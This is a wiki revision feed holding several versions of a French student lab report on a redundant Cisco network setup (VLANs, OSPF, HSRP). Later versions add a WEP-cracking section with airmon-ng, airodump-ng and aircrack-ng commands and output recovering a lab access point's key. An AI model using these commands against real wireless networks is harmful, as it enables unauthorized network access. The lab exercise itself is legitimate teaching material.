l'interface 0/2 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet&lt;br /&gt;
&lt;br /&gt;
===Configuration de la redondance===&lt;br /&gt;
&lt;br /&gt;
Pour assurer la redondance des routeurs on utilise le logiciel ospf et on configure les métriques des routeurs(1 pour le routeur principal et 2 pour le routeur secondaire) afin de donner l'ordre de priorité des routeurs. Cette manipulation assure la redondance des serveurs en ipv4.&lt;br /&gt;
&lt;br /&gt;
Pour l'ipv6, la gestion de la redondance a été faite en configurant &amp;quot;nd router-preference&amp;quot; a high pour le 6509 et a low pour le 3560E. quant a l'interconnexion avec les internet, elle se fait avec les métriques comme dit précédemment.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Routeur virtuel===&lt;br /&gt;
&lt;br /&gt;
Les différentes machines virtuelles pressentes sur le Vlan 2 ont besoin, d'un routeur pour communiquer vers l'extérieur. Mais comme nous avons deux routeurs et que les VM ne peuvent en avoir qu'un, nous avons crée un routeur virtuel. Les VM envoient leurs paquets à l'adresses du routeur virtuel. Ces paquets sont alors envoyés par l'un ou l'autre des routeurs selon les routes que l'on a fixé.&lt;br /&gt;
&lt;br /&gt;
Pour fixer les routes, on a utiliser le HSRP de façon a ce que les communication passent en priorité sur le 6509 (si on ne fais pas cette manip les paquets sortent par le 3560E et reviennent par le 6509 ce qui peut poser des problèmes si l'un des deux routeurs tombe). On a donc installer HSRP sur les routeurs et on a définie la priorité du 6509 sur 120 et la priorité du 3506E sur 110. Les paquets passent dorénavant par le routeur qui a la plus haute priorité, ici le 6509.&lt;br /&gt;
&lt;br /&gt;
==Installation des VM==&lt;br /&gt;
&lt;br /&gt;
pastabox.site&lt;br /&gt;
&lt;br /&gt;
==crackage WEP==&lt;br /&gt;
&lt;br /&gt;
on utilise airmon pour configurer la che wiffi pour recevoir tous les paquets qui passent&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0598a3&lt;br /&gt;
&lt;br /&gt;
On peut voir que le reseau a été renomé:&lt;br /&gt;
&lt;br /&gt;
 root@zabeth07:~# airmon-ng&lt;br /&gt;
 PHY	Interface	Driver		Chipset&lt;br /&gt;
 phy2	wlan0mon	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
ensuite, on liste tous les paquets qui passent a vec la commande airodump en filtrant par le ssid de la craccote06 et le channel 9 qui est le channel ou se trouve la cracotte&lt;br /&gt;
&lt;br /&gt;
 airodump-ng --bssid 04:DA:D2:9C:50:55 -c 9 -w log wlan0mon&lt;br /&gt;
&lt;br /&gt;
Avec la commande aircrack on decode la clef wep&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                              Aircrack-ng 1.5.2 &lt;br /&gt;
                 [00:00:00] Tested 665 keys (got 99549 IVs)&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/ 50   F1(124160) 6C(112640) BA(112384) B4(111872) 18(111104) &lt;br /&gt;
    1    6/  1   32(110848) 28(109568) B5(109568) 11(109312) 52(109056) &lt;br /&gt;
    2    0/  2   A3(137216) AB(113408) D7(112384) 84(111616) 52(110592) &lt;br /&gt;
    3    0/  1   A3(137728) 7C(112896) 39(111872) 6B(111360) 10(111104) &lt;br /&gt;
    4    0/  1   A3(145920) D8(118272) 57(116224) 28(113408) 86(111872) &lt;br /&gt;
             KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:99:99:99 ] &lt;br /&gt;
 	Decrypted correctly: 100%&lt;/div&gt;</summary>
		<author><name>Tvitteco</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&amp;diff=53171</id>
		<title>TP sysres IMA2a5 2020/2021 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&amp;diff=53171"/>
				<updated>2020-11-04T14:41:32Z</updated>
		
		<summary type="html">&lt;p&gt;Tvitteco : /* crackage WEP */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Ce rapport présente la mise en place d’un réseau redondé et la gestion de la sécurité&lt;br /&gt;
&lt;br /&gt;
__TOC__&lt;br /&gt;
=test=&lt;br /&gt;
==Partie commune==&lt;br /&gt;
&lt;br /&gt;
===Installation du 6509===&lt;br /&gt;
&lt;br /&gt;
Le routeur 6509 est un routeur que l'on peut modifier d'un point de vue hardware.&lt;br /&gt;
&lt;br /&gt;
On a donc dus installer le 6509 sur la baie et insérer les cartes superviseurs ainsi que les cartes d'entrées sorties.&lt;br /&gt;
&lt;br /&gt;
=== configuration 3560E ===&lt;br /&gt;
La configuration du 3560E se fait via un port série et minicom&lt;br /&gt;
&lt;br /&gt;
Elle consiste a se connecter au Vlan130 afin d'avoir un accès au réseau polytech ainsi qu'a internet, et de créer 11 Vlan.&lt;br /&gt;
Les Vlans:&lt;br /&gt;
Le Vlan 1 permet la communication entres les trois routeurs de l'architecture&lt;br /&gt;
Le Vlan 2 relie les routeurs au serveur capbreton qui héberge les machines virtuel&lt;br /&gt;
Les Vlans 3 a 11 serons distribués entre les personnes pour crée des réseaux locaux individuels&lt;br /&gt;
&lt;br /&gt;
Les interfaces:&lt;br /&gt;
L' interfaces 10Gbits 0/1 sont configurés en mode trunk pour la communication avec le 6509 via la fibre&lt;br /&gt;
l'interface 0/5 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet&lt;br /&gt;
l'interface 0/2 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet&lt;br /&gt;
&lt;br /&gt;
===Configuration de la redondance===&lt;br /&gt;
&lt;br /&gt;
Pour assurer la redondance des routeurs on utilise le logiciel ospf et on configure les métriques des routeurs(1 pour le routeur principal et 2 pour le routeur secondaire) afin de donner l'ordre de priorité des routeurs. Cette manipulation assure la redondance des serveurs en ipv4.&lt;br /&gt;
&lt;br /&gt;
Pour l'ipv6, la gestion de la redondance a été faite en configurant &amp;quot;nd router-preference&amp;quot; a high pour le 6509 et a low pour le 3560E. quant a l'interconnexion avec les internet, elle se fait avec les métriques comme dit précédemment.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Routeur virtuel===&lt;br /&gt;
&lt;br /&gt;
Les différentes machines virtuelles pressentes sur le Vlan 2 ont besoin, d'un routeur pour communiquer vers l'extérieur. Mais comme nous avons deux routeurs et que les VM ne peuvent en avoir qu'un, nous avons crée un routeur virtuel. Les VM envoient leurs paquets à l'adresses du routeur virtuel. Ces paquets sont alors envoyés par l'un ou l'autre des routeurs selon les routes que l'on a fixé.&lt;br /&gt;
&lt;br /&gt;
Pour fixer les routes, on a utiliser le HSRP de façon a ce que les communication passent en priorité sur le 6509 (si on ne fais pas cette manip les paquets sortent par le 3560E et reviennent par le 6509 ce qui peut poser des problèmes si l'un des deux routeurs tombe). On a donc installer HSRP sur les routeurs et on a définie la priorité du 6509 sur 120 et la priorité du 3506E sur 110. Les paquets passent dorénavant par le routeur qui a la plus haute priorité, ici le 6509.&lt;br /&gt;
&lt;br /&gt;
==Installation des VM==&lt;br /&gt;
&lt;br /&gt;
pastabox.site&lt;br /&gt;
&lt;br /&gt;
==crackage WEP==&lt;br /&gt;
&lt;br /&gt;
on utilise airmon pour configurer la che wiffi pour recevoir tous les paquets qui passent&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0598a3&lt;br /&gt;
&lt;br /&gt;
On peut voir que le reseau a été renomé:&lt;br /&gt;
&lt;br /&gt;
 root@zabeth07:~# airmon-ng&lt;br /&gt;
 PHY	Interface	Driver		Chipset&lt;br /&gt;
 phy2	wlan0mon	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
ensuite, on liste tous les paquets qui passent a vec la commande airodump en filtrant par le ssid de la craccote06 et le channel 9 qui est le channel ou se trouve la cracotte&lt;br /&gt;
&lt;br /&gt;
 airodump-ng --bssid 04:DA:D2:9C:50:55 -c 9 -w log wlan0mon&lt;br /&gt;
&lt;br /&gt;
Avec la commande aircrack on decode la clef wep&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                              Aircrack-ng 1.5.2 &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                 [00:00:00] Tested 665 keys (got 99549 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/ 50   F1(124160) 6C(112640) BA(112384) B4(111872) 18(111104) &lt;br /&gt;
    1    6/  1   32(110848) 28(109568) B5(109568) 11(109312) 52(109056) &lt;br /&gt;
    2    0/  2   A3(137216) AB(113408) D7(112384) 84(111616) 52(110592) &lt;br /&gt;
    3    0/  1   A3(137728) 7C(112896) 39(111872) 6B(111360) 10(111104) &lt;br /&gt;
    4    0/  1   A3(145920) D8(118272) 57(116224) 28(113408) 86(111872) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:99:99:99 ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;/div&gt;</summary>
		<author><name>Tvitteco</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&amp;diff=53169</id>
		<title>TP sysres IMA2a5 2020/2021 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&amp;diff=53169"/>
				<updated>2020-11-04T14:37:21Z</updated>
		
		<summary type="html">&lt;p&gt;Tvitteco : /* crackage WEP */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Ce rapport présente la mise en place d’un réseau redondé et la gestion de la sécurité&lt;br /&gt;
&lt;br /&gt;
__TOC__&lt;br /&gt;
=test=&lt;br /&gt;
==Partie commune==&lt;br /&gt;
&lt;br /&gt;
===Installation du 6509===&lt;br /&gt;
&lt;br /&gt;
Le routeur 6509 est un routeur que l'on peut modifier d'un point de vue hardware.&lt;br /&gt;
&lt;br /&gt;
On a donc dus installer le 6509 sur la baie et insérer les cartes superviseurs ainsi que les cartes d'entrées sorties.&lt;br /&gt;
&lt;br /&gt;
=== configuration 3560E ===&lt;br /&gt;
La configuration du 3560E se fait via un port série et minicom&lt;br /&gt;
&lt;br /&gt;
Elle consiste a se connecter au Vlan130 afin d'avoir un accès au réseau polytech ainsi qu'a internet, et de créer 11 Vlan.&lt;br /&gt;
Les Vlans:&lt;br /&gt;
Le Vlan 1 permet la communication entres les trois routeurs de l'architecture&lt;br /&gt;
Le Vlan 2 relie les routeurs au serveur capbreton qui héberge les machines virtuel&lt;br /&gt;
Les Vlans 3 a 11 serons distribués entre les personnes pour crée des réseaux locaux individuels&lt;br /&gt;
&lt;br /&gt;
Les interfaces:&lt;br /&gt;
L' interfaces 10Gbits 0/1 sont configurés en mode trunk pour la communication avec le 6509 via la fibre&lt;br /&gt;
l'interface 0/5 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet&lt;br /&gt;
l'interface 0/2 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet&lt;br /&gt;
&lt;br /&gt;
===Configuration de la redondance===&lt;br /&gt;
&lt;br /&gt;
Pour assurer la redondance des routeurs on utilise le logiciel ospf et on configure les métriques des routeurs(1 pour le routeur principal et 2 pour le routeur secondaire) afin de donner l'ordre de priorité des routeurs. Cette manipulation assure la redondance des serveurs en ipv4.&lt;br /&gt;
&lt;br /&gt;
Pour l'ipv6, la gestion de la redondance a été faite en configurant &amp;quot;nd router-preference&amp;quot; a high pour le 6509 et a low pour le 3560E. quant a l'interconnexion avec les internet, elle se fait avec les métriques comme dit précédemment.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Routeur virtuel===&lt;br /&gt;
&lt;br /&gt;
Les différentes machines virtuelles pressentes sur le Vlan 2 ont besoin, d'un routeur pour communiquer vers l'extérieur. Mais comme nous avons deux routeurs et que les VM ne peuvent en avoir qu'un, nous avons crée un routeur virtuel. Les VM envoient leurs paquets à l'adresses du routeur virtuel. Ces paquets sont alors envoyés par l'un ou l'autre des routeurs selon les routes que l'on a fixé.&lt;br /&gt;
&lt;br /&gt;
Pour fixer les routes, on a utiliser le HSRP de façon a ce que les communication passent en priorité sur le 6509 (si on ne fais pas cette manip les paquets sortent par le 3560E et reviennent par le 6509 ce qui peut poser des problèmes si l'un des deux routeurs tombe). On a donc installer HSRP sur les routeurs et on a définie la priorité du 6509 sur 120 et la priorité du 3506E sur 110. Les paquets passent dorénavant par le routeur qui a la plus haute priorité, ici le 6509.&lt;br /&gt;
&lt;br /&gt;
==Installation des VM==&lt;br /&gt;
&lt;br /&gt;
pastabox.site&lt;br /&gt;
&lt;br /&gt;
==crackage WEP==&lt;br /&gt;
&lt;br /&gt;
on utilise airmon pour configurer la che wiffi pour recevoir tous les paquets qui passent&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0598a3&lt;br /&gt;
&lt;br /&gt;
 root@zabeth07:~# airmon-ng&lt;br /&gt;
&lt;br /&gt;
 PHY	Interface	Driver		Chipset&lt;br /&gt;
 phy2	wlan0mon	rt2800usb	Ralink Technology, Corp. RT5370&lt;/div&gt;</summary>
		<author><name>Tvitteco</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&amp;diff=53167</id>
		<title>TP sysres IMA2a5 2020/2021 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&amp;diff=53167"/>
				<updated>2020-11-04T14:37:07Z</updated>
		
		<summary type="html">&lt;p&gt;Tvitteco : /* crackage WEP */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Ce rapport présente la mise en place d’un réseau redondé et la gestion de la sécurité&lt;br /&gt;
&lt;br /&gt;
__TOC__&lt;br /&gt;
=test=&lt;br /&gt;
==Partie commune==&lt;br /&gt;
&lt;br /&gt;
===Installation du 6509===&lt;br /&gt;
&lt;br /&gt;
Le routeur 6509 est un routeur que l'on peut modifier d'un point de vue hardware.&lt;br /&gt;
&lt;br /&gt;
On a donc dus installer le 6509 sur la baie et insérer les cartes superviseurs ainsi que les cartes d'entrées sorties.&lt;br /&gt;
&lt;br /&gt;
=== configuration 3560E ===&lt;br /&gt;
La configuration du 3560E se fait via un port série et minicom&lt;br /&gt;
&lt;br /&gt;
Elle consiste a se connecter au Vlan130 afin d'avoir un accès au réseau polytech ainsi qu'a internet, et de créer 11 Vlan.&lt;br /&gt;
Les Vlans:&lt;br /&gt;
Le Vlan 1 permet la communication entres les trois routeurs de l'architecture&lt;br /&gt;
Le Vlan 2 relie les routeurs au serveur capbreton qui héberge les machines virtuel&lt;br /&gt;
Les Vlans 3 a 11 serons distribués entre les personnes pour crée des réseaux locaux individuels&lt;br /&gt;
&lt;br /&gt;
Les interfaces:&lt;br /&gt;
L' interfaces 10Gbits 0/1 sont configurés en mode trunk pour la communication avec le 6509 via la fibre&lt;br /&gt;
l'interface 0/5 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet&lt;br /&gt;
l'interface 0/2 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet&lt;br /&gt;
&lt;br /&gt;
===Configuration de la redondance===&lt;br /&gt;
&lt;br /&gt;
Pour assurer la redondance des routeurs on utilise le logiciel ospf et on configure les métriques des routeurs(1 pour le routeur principal et 2 pour le routeur secondaire) afin de donner l'ordre de priorité des routeurs. Cette manipulation assure la redondance des serveurs en ipv4.&lt;br /&gt;
&lt;br /&gt;
Pour l'ipv6, la gestion de la redondance a été faite en configurant &amp;quot;nd router-preference&amp;quot; a high pour le 6509 et a low pour le 3560E. quant a l'interconnexion avec les internet, elle se fait avec les métriques comme dit précédemment.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Routeur virtuel===&lt;br /&gt;
&lt;br /&gt;
Les différentes machines virtuelles pressentes sur le Vlan 2 ont besoin, d'un routeur pour communiquer vers l'extérieur. Mais comme nous avons deux routeurs et que les VM ne peuvent en avoir qu'un, nous avons crée un routeur virtuel. Les VM envoient leurs paquets à l'adresses du routeur virtuel. Ces paquets sont alors envoyés par l'un ou l'autre des routeurs selon les routes que l'on a fixé.&lt;br /&gt;
&lt;br /&gt;
Pour fixer les routes, on a utiliser le HSRP de façon a ce que les communication passent en priorité sur le 6509 (si on ne fais pas cette manip les paquets sortent par le 3560E et reviennent par le 6509 ce qui peut poser des problèmes si l'un des deux routeurs tombe). On a donc installer HSRP sur les routeurs et on a définie la priorité du 6509 sur 120 et la priorité du 3506E sur 110. Les paquets passent dorénavant par le routeur qui a la plus haute priorité, ici le 6509.&lt;br /&gt;
&lt;br /&gt;
==Installation des VM==&lt;br /&gt;
&lt;br /&gt;
pastabox.site&lt;br /&gt;
&lt;br /&gt;
==crackage WEP==&lt;br /&gt;
&lt;br /&gt;
on utilise airmon pour configurer la che wiffi pour recevoir tous les paquets qui passent&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0598a3&lt;br /&gt;
&lt;br /&gt;
 root@zabeth07:~# airmon-ng&lt;br /&gt;
&lt;br /&gt;
 PHY	Interface	Driver		Chipset&lt;br /&gt;
&lt;br /&gt;
 phy2	wlan0mon	rt2800usb	Ralink Technology, Corp. RT5370&lt;/div&gt;</summary>
		<author><name>Tvitteco</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&amp;diff=53166</id>
		<title>TP sysres IMA2a5 2020/2021 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&amp;diff=53166"/>
				<updated>2020-11-04T14:36:12Z</updated>
		
		<summary type="html">&lt;p&gt;Tvitteco : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Ce rapport présente la mise en place d’un réseau redondé et la gestion de la sécurité&lt;br /&gt;
&lt;br /&gt;
__TOC__&lt;br /&gt;
=test=&lt;br /&gt;
==Partie commune==&lt;br /&gt;
&lt;br /&gt;
===Installation du 6509===&lt;br /&gt;
&lt;br /&gt;
Le routeur 6509 est un routeur que l'on peut modifier d'un point de vue hardware.&lt;br /&gt;
&lt;br /&gt;
On a donc dus installer le 6509 sur la baie et insérer les cartes superviseurs ainsi que les cartes d'entrées sorties.&lt;br /&gt;
&lt;br /&gt;
=== configuration 3560E ===&lt;br /&gt;
La configuration du 3560E se fait via un port série et minicom&lt;br /&gt;
&lt;br /&gt;
Elle consiste a se connecter au Vlan130 afin d'avoir un accès au réseau polytech ainsi qu'a internet, et de créer 11 Vlan.&lt;br /&gt;
Les Vlans:&lt;br /&gt;
Le Vlan 1 permet la communication entres les trois routeurs de l'architecture&lt;br /&gt;
Le Vlan 2 relie les routeurs au serveur capbreton qui héberge les machines virtuel&lt;br /&gt;
Les Vlans 3 a 11 serons distribués entre les personnes pour crée des réseaux locaux individuels&lt;br /&gt;
&lt;br /&gt;
Les interfaces:&lt;br /&gt;
L' interfaces 10Gbits 0/1 sont configurés en mode trunk pour la communication avec le 6509 via la fibre&lt;br /&gt;
l'interface 0/5 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet&lt;br /&gt;
l'interface 0/2 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet&lt;br /&gt;
&lt;br /&gt;
===Configuration de la redondance===&lt;br /&gt;
&lt;br /&gt;
Pour assurer la redondance des routeurs on utilise le logiciel ospf et on configure les métriques des routeurs(1 pour le routeur principal et 2 pour le routeur secondaire) afin de donner l'ordre de priorité des routeurs. Cette manipulation assure la redondance des serveurs en ipv4.&lt;br /&gt;
&lt;br /&gt;
Pour l'ipv6, la gestion de la redondance a été faite en configurant &amp;quot;nd router-preference&amp;quot; a high pour le 6509 et a low pour le 3560E. quant a l'interconnexion avec les internet, elle se fait avec les métriques comme dit précédemment.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Routeur virtuel===&lt;br /&gt;
&lt;br /&gt;
Les différentes machines virtuelles pressentes sur le Vlan 2 ont besoin, d'un routeur pour communiquer vers l'extérieur. Mais comme nous avons deux routeurs et que les VM ne peuvent en avoir qu'un, nous avons crée un routeur virtuel. Les VM envoient leurs paquets à l'adresses du routeur virtuel. Ces paquets sont alors envoyés par l'un ou l'autre des routeurs selon les routes que l'on a fixé.&lt;br /&gt;
&lt;br /&gt;
Pour fixer les routes, on a utiliser le HSRP de façon a ce que les communication passent en priorité sur le 6509 (si on ne fais pas cette manip les paquets sortent par le 3560E et reviennent par le 6509 ce qui peut poser des problèmes si l'un des deux routeurs tombe). On a donc installer HSRP sur les routeurs et on a définie la priorité du 6509 sur 120 et la priorité du 3506E sur 110. Les paquets passent dorénavant par le routeur qui a la plus haute priorité, ici le 6509.&lt;br /&gt;
&lt;br /&gt;
==Installation des VM==&lt;br /&gt;
&lt;br /&gt;
pastabox.site&lt;br /&gt;
&lt;br /&gt;
==crackage WEP==&lt;br /&gt;
&lt;br /&gt;
on utilise airmon pour configurer la che wiffi pour recevoir tous les paquets qui passent&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0598a3&lt;/div&gt;</summary>
		<author><name>Tvitteco</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&amp;diff=52544</id>
		<title>TP sysres IMA2a5 2020/2021 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&amp;diff=52544"/>
				<updated>2020-10-02T16:50:47Z</updated>
		
		<summary type="html">&lt;p&gt;Tvitteco : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Ce rapport présente la mise en place d’un réseau redondé et la gestion de la sécurité&lt;br /&gt;
&lt;br /&gt;
__TOC__&lt;br /&gt;
=test=&lt;br /&gt;
==Partie commune==&lt;br /&gt;
&lt;br /&gt;
===Installation du 6509===&lt;br /&gt;
&lt;br /&gt;
Le routeur 6509 est un routeur que l'on peut modifier d'un point de vue hardware.&lt;br /&gt;
&lt;br /&gt;
On a donc dus installer le 6509 sur la baie et insérer les cartes superviseurs ainsi que les cartes d'entrées sorties.&lt;br /&gt;
&lt;br /&gt;
=== configuration 3560E ===&lt;br /&gt;
La configuration du 3560E se fait via un port série et minicom&lt;br /&gt;
&lt;br /&gt;
Elle consiste a se connecter au Vlan130 afin d'avoir un accès au réseau polytech ainsi qu'a internet, et de créer 11 Vlan.&lt;br /&gt;
Les Vlans:&lt;br /&gt;
Le Vlan 1 permet la communication entres les trois routeurs de l'architecture&lt;br /&gt;
Le Vlan 2 relie les routeurs au serveur capbreton qui héberge les machines virtuel&lt;br /&gt;
Les Vlans 3 a 11 serons distribués entre les personnes pour crée des réseaux locaux individuels&lt;br /&gt;
&lt;br /&gt;
Les interfaces:&lt;br /&gt;
L' interfaces 10Gbits 0/1 sont configurés en mode trunk pour la communication avec le 6509 via la fibre&lt;br /&gt;
l'interface 0/5 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet&lt;br /&gt;
l'interface 0/2 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet&lt;br /&gt;
&lt;br /&gt;
===Configuration de la redondance===&lt;br /&gt;
&lt;br /&gt;
Pour assurer la redondance des routeurs on utilise le logiciel ospf et on configure les métriques des routeurs(1 pour le routeur principal et 2 pour le routeur secondaire) afin de donner l'ordre de priorité des routeurs. Cette manipulation assure la redondance des serveurs en ipv4.&lt;br /&gt;
&lt;br /&gt;
Pour l'ipv6, la gestion de la redondance a été faite en configurant &amp;quot;nd router-preference&amp;quot; a high pour le 6509 et a low pour le 3560E. quant a l'interconnexion avec les internet, elle se fait avec les métriques comme dit précédemment.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Routeur virtuel===&lt;br /&gt;
&lt;br /&gt;
Les différentes machines virtuelles pressentes sur le Vlan 2 ont besoin, d'un routeur pour communiquer vers l'extérieur. Mais comme nous avons deux routeurs et que les VM ne peuvent en avoir qu'un, nous avons crée un routeur virtuel. Les VM envoient leurs paquets à l'adresses du routeur virtuel. Ces paquets sont alors envoyés par l'un ou l'autre des routeurs selon les routes que l'on a fixé.&lt;br /&gt;
&lt;br /&gt;
Pour fixer les routes, on a utiliser le HSRP de façon a ce que les communication passent en priorité sur le 6509 (si on ne fais pas cette manip les paquets sortent par le 3560E et reviennent par le 6509 ce qui peut poser des problèmes si l'un des deux routeurs tombe). On a donc installer HSRP sur les routeurs et on a définie la priorité du 6509 sur 120 et la priorité du 3506E sur 110. Les paquets passent dorénavant par le routeur qui a la plus haute priorité, ici le 6509.&lt;br /&gt;
&lt;br /&gt;
==Installation des VM==&lt;br /&gt;
&lt;br /&gt;
pastabox.site&lt;/div&gt;</summary>
		<author><name>Tvitteco</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&amp;diff=52543</id>
		<title>TP sysres IMA2a5 2020/2021 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&amp;diff=52543"/>
				<updated>2020-10-02T16:50:25Z</updated>
		
		<summary type="html">&lt;p&gt;Tvitteco : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Ce rapport présente la mise en place d’un réseau redondé et la gestion de la sécurité&lt;br /&gt;
&lt;br /&gt;
__TOC__&lt;br /&gt;
&lt;br /&gt;
==Partie commune==&lt;br /&gt;
&lt;br /&gt;
===Installation du 6509===&lt;br /&gt;
&lt;br /&gt;
Le routeur 6509 est un routeur que l'on peut modifier d'un point de vue hardware.&lt;br /&gt;
&lt;br /&gt;
On a donc dus installer le 6509 sur la baie et insérer les cartes superviseurs ainsi que les cartes d'entrées sorties.&lt;br /&gt;
&lt;br /&gt;
=== configuration 3560E ===&lt;br /&gt;
La configuration du 3560E se fait via un port série et minicom&lt;br /&gt;
&lt;br /&gt;
Elle consiste a se connecter au Vlan130 afin d'avoir un accès au réseau polytech ainsi qu'a internet, et de créer 11 Vlan.&lt;br /&gt;
Les Vlans:&lt;br /&gt;
Le Vlan 1 permet la communication entres les trois routeurs de l'architecture&lt;br /&gt;
Le Vlan 2 relie les routeurs au serveur capbreton qui héberge les machines virtuel&lt;br /&gt;
Les Vlans 3 a 11 serons distribués entre les personnes pour crée des réseaux locaux individuels&lt;br /&gt;
&lt;br /&gt;
Les interfaces:&lt;br /&gt;
L' interfaces 10Gbits 0/1 sont configurés en mode trunk pour la communication avec le 6509 via la fibre&lt;br /&gt;
l'interface 0/5 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet&lt;br /&gt;
l'interface 0/2 est configurée sur le vlan 2 pour la communication avec capbreton en Ethernet&lt;br /&gt;
&lt;br /&gt;
===Configuration de la redondance===&lt;br /&gt;
&lt;br /&gt;
Pour assurer la redondance des routeurs on utilise le logiciel ospf et on configure les métriques des routeurs(1 pour le routeur principal et 2 pour le routeur secondaire) afin de donner l'ordre de priorité des routeurs. Cette manipulation assure la redondance des serveurs en ipv4.&lt;br /&gt;
&lt;br /&gt;
Pour l'ipv6, la gestion de la redondance a été faite en configurant &amp;quot;nd router-preference&amp;quot; a high pour le 6509 et a low pour le 3560E. quant a l'interconnexion avec les internet, elle se fait avec les métriques comme dit précédemment.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Routeur virtuel===&lt;br /&gt;
&lt;br /&gt;
Les différentes machines virtuelles pressentes sur le Vlan 2 ont besoin, d'un routeur pour communiquer vers l'extérieur. Mais comme nous avons deux routeurs et que les VM ne peuvent en avoir qu'un, nous avons crée un routeur virtuel. Les VM envoient leurs paquets à l'adresses du routeur virtuel. Ces paquets sont alors envoyés par l'un ou l'autre des routeurs selon les routes que l'on a fixé.&lt;br /&gt;
&lt;br /&gt;
Pour fixer les routes, on a utiliser le HSRP de façon a ce que les communication passent en priorité sur le 6509 (si on ne fais pas cette manip les paquets sortent par le 3560E et reviennent par le 6509 ce qui peut poser des problèmes si l'un des deux routeurs tombe). On a donc installer HSRP sur les routeurs et on a définie la priorité du 6509 sur 120 et la priorité du 3506E sur 110. Les paquets passent dorénavant par le routeur qui a la plus haute priorité, ici le 6509.&lt;br /&gt;
&lt;br /&gt;
==Installation des VM==&lt;br /&gt;
&lt;br /&gt;
pastabox.site&lt;/div&gt;</summary>
		<author><name>Tvitteco</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&amp;diff=52542</id>
		<title>TP sysres IMA2a5 2020/2021 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G6&amp;diff=52542"/>
				<updated>2020-10-02T16:48:14Z</updated>
		
		<summary type="html">&lt;p&gt;Tvitteco : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
&lt;br /&gt;
==Partie commune==&lt;br /&gt;
&lt;br /&gt;
===Installation du 6509===&lt;br /&gt;
&lt;br /&gt;
Le routeur 6509 est un routeur que l'on peut modifier d'un point de vue hardware.&lt;br /&gt;
&lt;br /&gt;
On a donc dus installer le 6509 sur la baie et insérer les cartes superviseurs ainsi que les cartes d'entrées sorties.&lt;br /&gt;
&lt;br /&gt;
=== configuration 3560E ===&lt;br /&gt;
La configuration du 3560E se fait via un port série et minicom&lt;br /&gt;
&lt;br /&gt;
